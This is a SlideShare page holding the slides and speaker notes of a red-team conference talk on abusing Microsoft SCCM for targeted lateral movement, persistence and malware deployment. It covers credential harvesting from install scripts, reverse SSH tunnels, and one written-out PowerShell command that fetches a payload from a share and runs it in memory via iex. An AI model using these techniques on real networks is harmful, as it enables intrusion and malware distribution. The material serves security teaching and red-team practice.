O SlideShare utiliza cookies para otimizar a funcionalidade e o desempenho do site, assim como para apresentar publicidade mais relevante aos nossos usuários. Se você continuar a navegar o site, você aceita o uso de cookies. Leia nosso Contrato do Usuário e nossa Política de Privacidade.
O SlideShare utiliza cookies para otimizar a funcionalidade e o desempenho do site, assim como para apresentar publicidade mais relevante aos nossos usuários. Se você continuar a utilizar o site, você aceita o uso de cookies. Leia nossa Política de Privacidade e nosso Contrato do Usuário para obter mais detalhes.
Very targeted, strategic use instead of mass compromise
-External? Grab some workstation, reverse SSH tunnel w/ RDP access, RDP from there into SCCM server -This is solely post-exploitation/maintaining access (3:00)
service account/LA credentials often in install scripts/notes
-If installed, basically your own internal C2 controller -List running processes, system information, registry access, SYSTEM command shell
-Uses Psexec, which is naughty on red teams… -This shell doesn’t work unless they put psexec on the server...meaning if it exists, it will likely blend in just fine.
Might have access to all distribution points as well as central site server due to administration overhead (9:00)
-If an application remains pushed out, hosts will continue to execute it during their normal checkins
-An open share is a common setup as the SCCM agents have to grab the deployed installation packages somehow. -powershell reaches out over unc to grab contents of text file and execute (12:00)
Red team upgrades using sccm for malware deployment
Red Team Upgrades:
Using SCCM for Malware Deployment
❖ Penetration Tester and Red Teamer for the Adaptive
Threat Division (ATD) of Veris Group
❖ Active developer on the PowerShell Empire project
❖ Offensive PowerShell advocate
❖ 2nd time speaking!
❖ This con is probably older than I am
❖ Indiana corn farmer turned h4x0r (not really)
❖ What is SCCM and how some admins fail at securing it
❖ Ways to abuse Microsoft’s System Center Configuration
Manager (SCCM) for targeted network compromise.
➢ I’m going to cover targeted, strategic use as opposed to mass pwnage
What this is...
Setting the Stage
❖ This talk assumes you have RDP access to a SCCM
❖ This talk is focused on abusing SCCM for lateral
movement/persistence in a targeted manner, not
obtaining access to SCCM.
❖ No, having access to SCCM does not mean you own the
❖ If you administer SCCM as a domain admin, you fail.
What is SCCM?
❖ Platform for distributing packages/applications to clients
❖ Packages, applications and install scripts are hosted on
the SCCM server
❖ Setup and maintained via an agent/server architecture
❖ Consists of a central site server with distribution points.
➢ Agents check in to server periodically to obtain new
❖ Basically acts as internal RAT/C2
SCCM in the enterprise
❖ 1 central site server with multiple distribution points
❖ Typically managed via controlled groups
➢ e.g. “SCCM Admins” in AD
❖ Typically setup/configured using a service account to run
the application/push updates
❖ Application contents (*cough, cough install scripts and
notes*) are hosted on a publicly available share
❖ Admins gonna admin
Right Click Tools
❖ Add-On that can be installed to assist in client
❖ Should be installed on a client such as an administrative
workstation...not on the server
➢ Admins install it on the server anyways
❖ Enables full control of managed endpoints
Why use SCCM in Red Teaming?
❖ Manages a ton of distributed clients
➢ Take control of the server and you have distributed workstation control
➢ SCCM agents are just waiting to run your code
❖ Live off of the land
➢ Keep your malicious implant count low, use SCCM for very targeted
➢ Looks like normal day-to-day traffic/activity
➢ To limit the risk of getting caught, become an admin and not a typical
Why use SCCM in Red Teaming? (cont)
❖ Allows you to identify and strategically group targets
➢ Able to push implants out in a very controlled and surgical manner
❖ Also acts as a persistence mechanism
Abusing SCCM: Hunting
❖ Some organizations have user->device mapping
➢ This allows for admins to create specific groups for departments
❖ We can abuse this to hunt for specific users without
generating any additional network/domain traffic
Abusing SCCM: Compromise
❖ Create an application/package that utilizes PowerShell for
payload delivery and execution
❖ Do so by creating a PowerShell payload and throw it up
on the public share SCCM uses (typically something like
Abusing SCCM: Compromise
❖ Create a script installer application to fetch and execute
➢ cmd.exe /c “powershell.exe -c “gc
serverNamesharedFolderApplicationFolderpayload.txt | iex””
❖ Deploy the application to your target group and wait for
the SCCM agents to check in
➢ Payload is fetched over UNC and runs in memory
❖ More here:
Questions and Contact
❖ Feel free to hit me up!
❖ enigma0x3 [at] gmail [dot] com
❖ @enigma0x3 on Twitter and Github
❖ enigma0x3 on Freenode: #psempire
❖ Blog: enigma0x3.wordpress.com